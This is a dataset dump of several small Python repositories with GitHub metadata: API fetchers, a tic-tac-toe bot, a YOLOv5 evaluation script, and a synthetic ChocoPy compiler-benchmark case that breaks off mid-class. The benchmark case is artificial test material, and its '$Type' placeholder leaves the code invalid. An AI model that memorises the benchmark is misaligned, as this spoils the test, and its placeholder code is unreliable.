blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
748c60e91fc5cc74b95f5054423b643030571a96
|
bd2dec1356593b427b46311e88cad58702ccc2e4
|
/main.py
|
2eca735650e5713712848256d57e85eb0a8a2817
|
[] |
no_license
|
rxw/csgo_matches
|
7b3af8a09717e44a1a0f7ee9c2fe5790407489c4
|
8c0bc21a2d1a53dc5723cc76526ecd4a6d8b3bf5
|
refs/heads/master
| 2022-06-15T18:16:38.025499
| 2020-05-04T22:41:47
| 2020-05-04T22:41:47
| 260,381,161
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
#!bin/python
import json
import requests
if __name__ == '__main__':
with open('creds.json', 'r') as f:
json_creds = f.read()
creds = json.loads(json_creds)
api_url = 'https://api.pandascore.co'
stats_url = '/csgo/matches'
r = requests.get(api_url + stats_url, params=creds)
print(r.text)
|
[
"tato@uribe.com.mx"
] |
tato@uribe.com.mx
|
11c395ef17817d7f1fad83e8372a60bc573b9489
|
c1f6a9f37dc2852c7fcc5d996b242172b176775b
|
/plugins/general.py
|
91fc4559af33c14573bd69fc13790b627139f79a
|
[] |
no_license
|
rasperepodvipodvert/vk_page_cover
|
b883e03b8157237b80fe9551e58cb49f643a20ae
|
c7d7970f4c2adbcb99e5b2330cf896e150819d44
|
refs/heads/master
| 2020-03-29T18:37:35.659098
| 2018-09-27T10:48:26
| 2018-09-27T10:48:26
| 150,223,809
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
def get_btc_cost(coin):
url = 'https://api.cryptonator.com/api/ticker/%s-usd' % coin
import urllib.request, json
data=[]
with urllib.request.urlopen(url) as url:
data = json.loads(url.read().decode())
return data['ticker']['price']
|
[
"ivan@filatovz.ru"
] |
ivan@filatovz.ru
|
e0b6078e03d52085af1e4c60300dba7c10eeb40a
|
db29394afc70f72840497f5796b210382ce83541
|
/tictacbot/tictactoe_bot.py
|
6906a772497cc74a7e9f8934c96f48c3af98019e
|
[] |
no_license
|
AFakeman/tictacbot
|
bd8e5d25f9eddff0bc938c776d0f4ca219f9ff13
|
28f350d91596ff3a5e24d7a09c69192883f5682b
|
refs/heads/master
| 2021-01-17T07:30:44.388045
| 2017-03-11T22:53:32
| 2017-03-11T22:53:32
| 83,735,136
| 0
| 0
| null | 2017-03-11T20:15:08
| 2017-03-02T23:24:41
|
Python
|
UTF-8
|
Python
| false
| false
| 2,147
|
py
|
from .tictactoe_game import TicTacToe, inspect, xy
opposite = TicTacToe.opposite
def calculate_attr(lane, turn, field_size, at_price=2, def_price=3, reinforce_price=2):
if lane["_"] == 0:
return "atk", 0
if lane[opposite(turn)] == 0 and lane[turn] == 0: # We should attack!
return "atk", at_price
elif lane[opposite(turn)] != 0 and lane[turn] == 0: # We should protect!
return "def", def_price ** lane[opposite(turn)]
elif lane[opposite(turn)] == 0 and lane[turn] != 0: # We should reinforce!
return "frc", reinforce_price ** lane[turn]
else:
return "atk", 0
class TicTacPlayer:
@staticmethod
def move(game):
field_size = game.field_size
turn = game.turn
vert_counts = [inspect(game.field, (0, 1), (i, 0), field_size) for i in range(field_size)]
hor_counts = [inspect(game.field, (1, 0), (0, i), field_size) for i in range(field_size)]
diag1_count = inspect(game.field, (1, 1), (0, 0), field_size)
diag2_count = inspect(game.field, (1, -1), (0, field_size - 1), field_size)
vert_lanes = [calculate_attr(vert_counts[i], turn, field_size) for i in range(field_size)]
hor_lanes = [calculate_attr(hor_counts[i], turn, field_size) for i in range(field_size)]
diag1 = calculate_attr(diag1_count, turn, field_size)
diag2 = calculate_attr(diag2_count, turn, field_size)
scores = {}
for x in range(field_size):
for y in range(field_size):
score = 0
if x == y:
score += diag1[1]
if x == field_size - 1 - y:
score += diag2[1]
score += vert_lanes[x][1]
score += hor_lanes[y][1]
scores[(x, y)] = score
max_cell = (-1, -1)
max_score = -1
for x in range(field_size):
for y in range(field_size):
if (max_score < scores[(x, y)]) and game.field[xy(field_size, x, y)] == '_':
max_score = scores[(x, y)]
max_cell = (x, y)
game.move(*max_cell)
|
[
"anton_suslov@me.com"
] |
anton_suslov@me.com
|
86289ab2c33ce91e7ef21b22dc256d3fb72b684d
|
49ac20f39a1b35b54ae47c7cfc47203165b37e4e
|
/deepblue/06.03_yolov5_model/yolo_rewrite/test.py
|
a4322c84a9f06760caaee1f48db726f0c56d3b74
|
[] |
no_license
|
walkerwzy/walker_jupyter_lab
|
30dedb2199534c166f5a315e2ed6cc7b54c5d548
|
626624100f4c3b19828755a773e1579e41ae38c8
|
refs/heads/master
| 2023-08-11T18:36:08.041160
| 2021-09-30T07:54:37
| 2021-09-30T07:54:37
| 371,611,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,080
|
py
|
import os
import cv2
import json
import argparse
import data_provider
import dataset
import heads
import maptool
import models
import nn_utils
import sys_utils
import torch
import torch.nn as nn
import numpy as np
from torch.utils.data import DataLoader
from tqdm import tqdm
from sys_utils import _single_instance_logger as logger
class Config:
def __init__(self):
self.base_directory = "workspace"
self.batch_size = 32
self.name = "default" # 实验名称
def get_path(self, path):
return f"{self.base_directory}/{self.name}/{path}"
def __repr__(self):
return json.dumps(self.__dict__, indent=4, ensure_ascii=False)
def get_test_dataset(self):
if self.dataset == "VOC":
provider = data_provider.VOCProvider("/data-rbd/wish/four_lesson/dataset/voc2007/VOCdevkitTest/VOC2007")
elif self.dataset == "COCO":
provider = data_provider.COCOProvider("/data-rbd/wish/four_lesson/dataset/coco2017", "2017", "val")
else:
assert False, f"Unknow dataset {self.dataset}"
return dataset.Dataset(False, config.image_size, provider, config.batch_size)
def get_dataloader_with_dataset(self, dataset):
batch_size = config.batch_size
num_workers = min([os.cpu_count(), batch_size, 8])
dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, pin_memory=True, collate_fn=dataset.collate_fn)
return dataloader
def test(model, test_loader, head, epoch=0):
model.eval()
param = next(model.parameters())
device = param.device
dtype = param.dtype
batch_size = test_loader.batch_size
with torch.no_grad():
groundtruth_annotations = {}
detection_annotations = {}
# test loader是使用centerAffine进行的
# normalize_annotations格式是[image_id, class_index, cx, cy, width, height]
for batch_index, (images, normalize_annotations, visual) in enumerate(tqdm(test_loader, desc=f"Eval map {epoch:03d} epoch")):
images = images.to(device, non_blocking=True).type(dtype)
predicts = model(images)
# 检测目标,得到的结果是[left, top, right, bottom, confidence, classes]
objects = head.detect(predicts, confidence_threshold=0.001, nms_threshold=0.6)
batch, channels, image_height, image_width = images.shape
visual_image_id, visual_image, visual_annotations, restore_info = visual
num_batch = images.shape[0]
normalize_annotations = normalize_annotations.to(device)
restore_info = normalize_annotations.new_tensor(restore_info) # pad_left, pad_top, origin_width, origin_height, scale
pixel_annotations = nn_utils.convert_to_pixel_annotation(normalize_annotations[:, [2, 3, 4, 5, 0, 1]], image_width, image_height)
for i in range(num_batch):
index = torch.where(pixel_annotations[:, 4] == i)[0]
if len(index) == 0:
continue
padx, pady, origin_width, origin_height, scale = restore_info[i]
pixel_annotations[index, :4] = (pixel_annotations[index, :4] - restore_info[i, [0, 1, 0, 1]]) / scale
for left, top, right, bottom, image_id, class_id in pixel_annotations.cpu().numpy():
image_id = int(image_id) + batch_index * batch_size
class_id = int(class_id)
if image_id not in groundtruth_annotations:
groundtruth_annotations[image_id] = []
groundtruth_annotations[image_id].append([left, top, right, bottom, 0, class_id])
for image_index, image_objs in enumerate(objects):
image_objs[:, 0].clamp_(0, image_width)
image_objs[:, 1].clamp_(0, image_height)
image_objs[:, 2].clamp_(0, image_width)
image_objs[:, 3].clamp_(0, image_height)
padx, pady, origin_width, origin_height, scale = restore_info[image_index]
image_objs[:, :4] = (image_objs[:, :4] - restore_info[image_index, [0, 1, 0, 1]]) / scale
image_id = image_index + batch_index * batch_size
detection_annotations[image_id] = image_objs.cpu().numpy()
# merge groundtruth_annotations
for image_id in groundtruth_annotations:
groundtruth_annotations[image_id] = np.array(groundtruth_annotations[image_id], dtype=np.float32)
map_result = maptool.MAPTool(groundtruth_annotations, detection_annotations, test_loader.dataset.provider.label_map)
map05, map075, map05095 = map_result.map
model_score = map05 * 0.1 + map05095 * 0.9
logger.info(f"Eval {epoch:03d} epoch, mAP@.5 [{map05:.6f}], mAP@.75 [{map075:.6f}], mAP@.5:.95 [{map05095:.6f}], Time: {map_result.compute_time:.2f} second")
return model_score
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--name", type=str, help="实验名称", default="debug")
parser.add_argument("--batch_size", type=int, help="批大小", default=32)
parser.add_argument("--network", type=str, help="网络的配置文件", default="models/yolov5m.yaml")
parser.add_argument("--weight", type=str, help="权重", default="/datav/wish/yolov5-2.0/cocom.pt")
parser.add_argument("--dataset", type=str, help="数据集", default="COCO")
parser.add_argument("--size", type=int, help="尺寸", default=640)
parser.add_argument("--device", type=int, help="GPU号", default=1)
args = parser.parse_args()
config = Config()
config.name = args.name
config.device = f"cuda:{args.device}"
torch.cuda.set_device(config.device)
config.image_size = args.size
config.weight = args.weight
config.network = args.network
config.dataset = args.dataset
config.batch_size = args.batch_size
sys_utils.setup_single_instance_logger(config.get_path("logs/log.log"))
logger.info(f"Startup, config: \n{config}")
checkpoint = torch.load(config.weight, map_location="cpu")
from_yolo_raw_checkpoint = "model.24.anchors" in checkpoint
dataset = config.get_test_dataset()
num_classes = dataset.provider.num_classes
model = models.Yolo(num_classes, config.network)
model.eval()
model.to(config.device)
if from_yolo_raw_checkpoint:
logger.info("Use yolo raw checkpoint")
checkpoint['anchors'] = checkpoint['model.24.anchors']
del checkpoint['model.24.anchors']
del checkpoint['model.24.anchor_grid']
head = heads.YoloHead(num_classes, model.anchors, model.strides)
model.fuse()
model.load_state_dict(checkpoint)
else:
model.load_state_dict(checkpoint)
head = heads.YoloHead(num_classes, model.anchors, model.strides)
model.fuse()
model.half()
dataloader = config.get_dataloader_with_dataset(dataset)
test(model, dataloader, head)
|
[
"walker.wzy@gmail.com"
] |
walker.wzy@gmail.com
|
159d50b91a1bdd3c41155ba8242ed42980a94bda
|
783382412a7cb93685d50069b041acbc06519ef3
|
/utils/average.py
|
0bec757eaa23685174dc5e5408db4a90a682485a
|
[] |
no_license
|
scy99ycs/customAnime
|
8a49e828a92b7f0b23f4b8bd03d61aa4e7324e79
|
37a2232229f6b620a1f8ea41efebab046fcc0057
|
refs/heads/master
| 2021-10-28T15:02:06.963470
| 2019-04-24T07:04:40
| 2019-04-24T07:04:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
"""
Average Tracker for training
"""
class AverageTracker:
"""
Average Tracker implementation for loss
"""
def __init__(self, name):
self._name = name
self.value = 0
self.n = 0
pass
def __call__(self):
return self.get_value()
def __len__(self):
return self.n
@property
def name(self):
return self._name
@name.setter
def name(self, value):
raise AttributeError('Cannot modify name of average tracker')
def update(self, value, n=1):
self.value = ((self.value * self.n) + (value * n)) / (self.n + n)
self.n += n
def get_value(self):
return self.value
def initialize(self):
self.value = 0
self.n = 0
|
[
"noreply@github.com"
] |
scy99ycs.noreply@github.com
|
69cd294a1199dd3224de74f4c1484c5f7a3cc684
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-6194.py
|
dff1f4eda2df9e68e045ed549fd8b7621d226b5d
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,757
|
py
|
# A resizable list of integers
class Vector(object):
items: [int] = None
size: int = 0
def __init__(self:"Vector"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector", idx: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector") -> int:
return self.size
# A resizable list of integers
class Vector2(object):
items: [int] = None
items2: [int] = None
size: int = 0
size2: int = 0
def __init__(self:"Vector2"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector2") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector2") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector2", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector2", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector2", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector2", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector2", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector2", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector2") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector2") -> int:
return self.size
# A resizable list of integers
class Vector3(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
def __init__(self:"Vector3"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector3") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector3", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector3", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector3", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector3", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector3", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector3", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector3") -> int:
return self.size
# A resizable list of integers
class Vector4(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
def __init__(self:"Vector4"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector4") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector4", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector4", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector4", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector4", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector4", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector4", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector4") -> int:
return self.size
# A resizable list of integers
class Vector5(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
items5: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
size5: int = 0
def __init__(self:"Vector5"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity5(self:"Vector5") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity5(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector5", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector5", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector5", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
item5:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector5", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector5", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector5", idx: $Type, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length5(self:"Vector5") -> int:
return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
doubling_limit:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector2(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector3(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector4(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
